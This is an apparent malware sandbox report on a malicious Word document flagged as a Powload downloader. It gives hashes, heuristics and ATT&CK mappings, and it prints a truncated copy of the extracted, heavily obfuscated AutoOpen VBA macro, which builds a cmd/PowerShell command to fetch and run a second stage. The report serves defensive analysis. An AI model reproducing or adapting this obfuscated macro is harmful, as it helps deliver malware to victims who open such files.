Office (OLE) malware analysis — malicious · 04730e6ef6eec020

MALICIOUS

Office (OLE)

83.6 KB Created: 2018-08-17 18:46:00 Authoring application: Microsoft Office Word First seen: 2018-08-26

MD5: 797c97736b63152d6a92b4c33a13fe40 SHA-1: afbfa7ddd12d00b1d6249e9b3fc2dc2a59ca7edb SHA-256: 04730e6ef6eec020e2fecc048a707104d0b94f81dbc9a68ee264bf41e90fd340

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro constructs a command string that appears to download and execute a second-stage payload using PowerShell. The ClamAV detection 'Doc.Downloader.Powload-6803405-0' further supports this analysis.

Heuristics 5

ClamAV: Doc.Downloader.Powload-6803405-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6803405-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38715 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	38715 bytes
SHA-256: `808ecc8289d204002cdaa326af4a39fc4144d7534706339bcfe487babf2b5f1a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DfsJYNvXJAEcfU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "nsjJBIK" Function wdZmEtKBWk() On Error Resume Next VarType Hex(iXYXh + TWaPvD) IsArray CCur(ffRFCm) IsArray GATJp ikUwOoszj = "mD /V" + ":o " + " /C " + " " + CStr(Chr(ajhrCtcCGn + llFRFtuMV + 34 + QFrnzsQmtpSo + EMlJqHH)) + " s^ET" + "^ " + "^ ^ ^" + "7^U^=p" + "^o^]er" + "/" + "he" + "^ll^ ^`" IsArray Hex(3) UAkSB = Atn(52) UAkSB = 250811356 pqEjJtWW = "e 1^X" + "2^iX^G" + "kXR^X" + "X^9XG#X" + "Z^" + "Q23" + "^X" + "C^0^Xb^" + "]^2iX^G" + "^o^X^" + "Z^Q2^" + "j^XHQ^" + "X^IX" UAkSB = Val(XzjVwD) IsArray wZUWz VarType mhRKW npkRsL = "^2O" + "X^G" + "^U^X" + "d^XX^uX" + "^FcX^Z" + "Q2iX^E" + "^MXbX2" + "p^X^GU" + "Xbg^20" + "^" + "XD/^X^" + "1X2^" VarType 6578 VarType Rnd(11) EHTumWniwBz = "}^X^" + "E" + "M^X" + "T]X9XCc" + "XaX2" UAkSB = Month(2) IsArray Hex(iZZiJ) IsArray Second(Qraqqs / aTpFR) EUwqaRQjo = "0X^HQ^" + "XcXX^6^" + "XC^8" + "^X^L]" + "^2^z" + "^X" + "^" + "G^#" + "Xb]2^3^" VarType Hex(97393 + iMLhfE) UAkSB = Sgn(16649 - CilSt / 1143 + cHvRNv) UAkSB = Sin(jEHaN - qaRSO) GdXAljhwR = "XGQ^X" + "^" + "b]" + "^2/^XG^" + "]XL^g" + "2^" + "uX^GU" + "^X" + "dXXv" + "XD^I^X" + "R]" wdZmEtKBWk = ikUwOoszj + pqEjJtWW + npkRsL + EHTumWniwBz + EUwqaRQjo + GdXAljhwR IsArray 78726312 UAkSB = 200985733 UAkSB = VtaWN End Function Function XKtmFnZoC() On Error Resume Next VarType CVar(iIrUm / VLKhw) IsArray CCur(ZfHzL) wvVZwfVSk = "^2l^XE^" + "X" + "Xa" + "^X^2" + "^0" + "^XH^QXc" + "^XX6^" + "XC8^XL]" + "2^z" + "XHk^Xb" + "^]2" + "^u^X^GU" + "^" VarType NwHts VarType otABfS IsArray CCur(2) JKwPQuu = "Xbg" + "^2qXHU" + "X^bQ^" + "2]" + "XC^0X^Z" + "g2.XG#" + "^X" + "L^g" UAkSB = AskTw VarType CDec(536) mwnLcJzjwmw = "^2^j^" + "XG^8X^" + "bQ" + "Xv^X^H" + "X^X^b" + "^X^2^X" + "XG^" UAkSB = Month(893) VarType Log(UvPQZ) QGiTw = "g^X^" + "dX^20X^" + "H^X" + "^XOg" + "^XvX" + "C^8^X" + "cX2^o" + "X^G^8^" + "Xe^X2^" + "h" + "XH^" + "IX^dX" + "^XuX" VarType Month(241) UAkSB = 4 oXvcdYllAsK = "G^" + "M^X^b^]" + "^2" + "t^" + "XC" + "^" + "8^X^" IsArray CVar(4598) UAkSB = udnNVn lmCLTEVT = "M^Q^X5X" + "^E^X^" + "Xa^" + "X2" + "0^X^H^" IsArray 286039691 UAkSB = 365539205 rzJMaSHKt = "Q^Xc^" + "XX^6XC^" + "8X^" + "L]" + "^2u^X^G" + "g^X^d" + "^Q2^h" IsArray Str(IHftz) UAkSB = 307532658 UAkSB = 704 AjauKmG = "^" + "X^" + "G]^X" + "Y^Q^" + "25X" + "^H^MX^" VarType zPzLOW IsArray miYUY rVvRlvhXVGj = "YQ2" + "u^X^" + "GcX^Y^" + "]" + "^2v^XG" + "^" + "0^Xc" + "^X" + "^2vX^" + "H" + "MXaQ^" IsArray Fix(SziNp) VarType Sin(67) IsArray Oct(WTKSb * rrMKA - 60563 - 93809) bZZZCpPP = "20^X" + "^G^UXL^" + "g2^jX" + "G8Xb" + "^Q" + "Xv^X" + "^E^0XS" + "^g^2" + "^" + "1XGY^X" + "WQ2XX^G" + "gXd^X^" XKtmFnZoC = wvVZwfVSk + JKwPQuu + mwnLcJzjwmw + QGiTw + oXvcdYllAsK + lmCLTEVT + rzJMaSHKt + AjauKmG + rVvRlvhXVGj + bZZZCpPP IsArray 7922 VarType Fix(wJqXzo) End Function Function WBisKLj() On Error Resume Next IsArray ajDFwq IsArray 9 HoQJhMcWnJj = "2^" + "0XH^" + "XXO^gX" + "vXC" + "8^XbQ2" + "^5^X" + "^G#" + "^XZQ2^" + "pXG" UAkSB = MErBp IsArray ZOVDI VarType 693 SlMjk = "c^Xa^X" + "^2^i" + "^XG8^X" + "c^g^X" + "u^X^GM" + "^Xb]^2" VarType UGhiHL VarType CDbl(470016367) UAkSB = TimeValue(40252 / HJEDp + 56435 * TBknm) AZPHDXMo = "^tXC^#" + "Xd^" + "X2^3^X" + "C8XR" + "^" + "Q2^h^X" + "^Dc^X" + "R]^X^" + "3^X^G^]" + "^" + "X^" IsArray 95 VarType Fix(420638883) qRnJQsqNt = "d]2RXC" + "cX^Lg" + "2^T^X" + "^" + "H^X" + "X" + "bX2p" + "^XHQX" + "KX^X" + ")^X^" + "E" + "X^X1]^" + "Xp^X^D" VarType Int(BjMXBz / 41580) UAkSB = Sgn(32248805) tjqrZUdpYO = "/X1X2" + "Q^" + "X^F" + "EXQ" + "^]Xg^" + "X^D0" + "^X^IXX" + ")XD^YX^" + "+^Q^" VarType 4081 IsArra ... (truncated)

SHA-256: 808ecc8289d204002cdaa326af4a39fc4144d7534706339bcfe487babf2b5f1a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DfsJYNvXJAEcfU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nsjJBIK"
Function wdZmEtKBWk()
On Error Resume Next
VarType Hex(iXYXh + TWaPvD)
   IsArray CCur(ffRFCm)
   IsArray GATJp
ikUwOoszj = "mD  /V" + ":o " + " /C  " + " " + CStr(Chr(ajhrCtcCGn + llFRFtuMV + 34 + QFrnzsQmtpSo + EMlJqHH)) + " s^ET" + "^ " + "^ ^ ^" + "7^U^=p" + "^o^]er" + "/" + "he" + "^ll^ ^`"
IsArray Hex(3)
   UAkSB = Atn(52)
   UAkSB = 250811356
pqEjJtWW = "e 1^X" + "2^iX^G" + "kXR^X" + "X^9XG#X" + "Z^" + "Q23" + "^X" + "C^0^Xb^" + "]^2iX^G" + "^o^X^" + "Z^Q2^" + "j^XHQ^" + "X^IX"
UAkSB = Val(XzjVwD)
   IsArray wZUWz
   VarType mhRKW
npkRsL = "^2O" + "X^G" + "^U^X" + "d^XX^uX" + "^FcX^Z" + "Q2iX^E" + "^MXbX2" + "p^X^GU" + "Xbg^20" + "^" + "XD/^X^" + "1X2^"
VarType 6578
   VarType Rnd(11)
EHTumWniwBz = "}^X^" + "E" + "M^X" + "T]X9XCc" + "XaX2"
UAkSB = Month(2)
   IsArray Hex(iZZiJ)
   IsArray Second(Qraqqs / aTpFR)
EUwqaRQjo = "0X^HQ^" + "XcXX^6^" + "XC^8" + "^X^L]" + "^2^z" + "^X" + "^" + "G^#" + "Xb]2^3^"
VarType Hex(97393 + iMLhfE)
   UAkSB = Sgn(16649 - CilSt / 1143 + cHvRNv)
   UAkSB = Sin(jEHaN - qaRSO)
GdXAljhwR = "XGQ^X" + "^" + "b]" + "^2/^XG^" + "]XL^g" + "2^" + "uX^GU" + "^X" + "dXXv" + "XD^I^X" + "R]"
wdZmEtKBWk = ikUwOoszj + pqEjJtWW + npkRsL + EHTumWniwBz + EUwqaRQjo + GdXAljhwR
   IsArray 78726312
   UAkSB = 200985733
   UAkSB = VtaWN
End Function
Function XKtmFnZoC()
On Error Resume Next
VarType CVar(iIrUm / VLKhw)
   IsArray CCur(ZfHzL)
wvVZwfVSk = "^2l^XE^" + "X" + "Xa" + "^X^2" + "^0" + "^XH^QXc" + "^XX6^" + "XC8^XL]" + "2^z" + "XHk^Xb" + "^]2" + "^u^X^GU" + "^"
VarType NwHts
   VarType otABfS
   IsArray CCur(2)
JKwPQuu = "Xbg" + "^2qXHU" + "X^bQ^" + "2]" + "XC^0X^Z" + "g2.XG#" + "^X" + "L^g"
UAkSB = AskTw
   VarType CDec(536)
mwnLcJzjwmw = "^2^j^" + "XG^8X^" + "bQ" + "Xv^X^H" + "X^X^b" + "^X^2^X" + "XG^"
UAkSB = Month(893)
   VarType Log(UvPQZ)
QGiTw = "g^X^" + "dX^20X^" + "H^X" + "^XOg" + "^XvX" + "C^8^X" + "cX2^o" + "X^G^8^" + "Xe^X2^" + "h" + "XH^" + "IX^dX" + "^XuX"
VarType Month(241)
   UAkSB = 4
oXvcdYllAsK = "G^" + "M^X^b^]" + "^2" + "t^" + "XC" + "^" + "8^X^"
IsArray CVar(4598)
   UAkSB = udnNVn
lmCLTEVT = "M^Q^X5X" + "^E^X^" + "Xa^" + "X2" + "0^X^H^"
IsArray 286039691
   UAkSB = 365539205
rzJMaSHKt = "Q^Xc^" + "XX^6XC^" + "8X^" + "L]" + "^2u^X^G" + "g^X^d" + "^Q2^h"
IsArray Str(IHftz)
   UAkSB = 307532658
   UAkSB = 704
AjauKmG = "^" + "X^" + "G]^X" + "Y^Q^" + "25X" + "^H^MX^"
VarType zPzLOW
   IsArray miYUY
rVvRlvhXVGj = "YQ2" + "u^X^" + "GcX^Y^" + "]" + "^2v^XG" + "^" + "0^Xc" + "^X" + "^2vX^" + "H" + "MXaQ^"
IsArray Fix(SziNp)
   VarType Sin(67)
   IsArray Oct(WTKSb * rrMKA - 60563 - 93809)
bZZZCpPP = "20^X" + "^G^UXL^" + "g2^jX" + "G8Xb" + "^Q" + "Xv^X" + "^E^0XS" + "^g^2" + "^" + "1XGY^X" + "WQ2XX^G" + "gXd^X^"
XKtmFnZoC = wvVZwfVSk + JKwPQuu + mwnLcJzjwmw + QGiTw + oXvcdYllAsK + lmCLTEVT + rzJMaSHKt + AjauKmG + rVvRlvhXVGj + bZZZCpPP
   IsArray 7922
   VarType Fix(wJqXzo)
End Function
Function WBisKLj()
On Error Resume Next
IsArray ajDFwq
   IsArray 9
HoQJhMcWnJj = "2^" + "0XH^" + "XXO^gX" + "vXC" + "8^XbQ2" + "^5^X" + "^G#" + "^XZQ2^" + "pXG"
UAkSB = MErBp
   IsArray ZOVDI
   VarType 693
SlMjk = "c^Xa^X" + "^2^i" + "^XG8^X" + "c^g^X" + "u^X^GM" + "^Xb]^2"
VarType UGhiHL
   VarType CDbl(470016367)
   UAkSB = TimeValue(40252 / HJEDp + 56435 * TBknm)
AZPHDXMo = "^tXC^#" + "Xd^" + "X2^3^X" + "C8XR" + "^" + "Q2^h^X" + "^Dc^X" + "R]^X^" + "3^X^G^]" + "^" + "X^"
IsArray 95
   VarType Fix(420638883)
qRnJQsqNt = "d]2RXC" + "cX^Lg" + "2^T^X" + "^" + "H^X" + "X" + "bX2p" + "^XHQX" + "KX^X" + ")^X^" + "E" + "X^X1]^" + "Xp^X^D"
VarType Int(BjMXBz / 41580)
   UAkSB = Sgn(32248805)
tjqrZUdpYO = "/X1X2" + "Q^" + "X^F" + "EXQ" + "^]Xg^" + "X^D0" + "^X^IXX" + ")XD^YX^" + "+^Q^"
VarType 4081
   IsArra
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.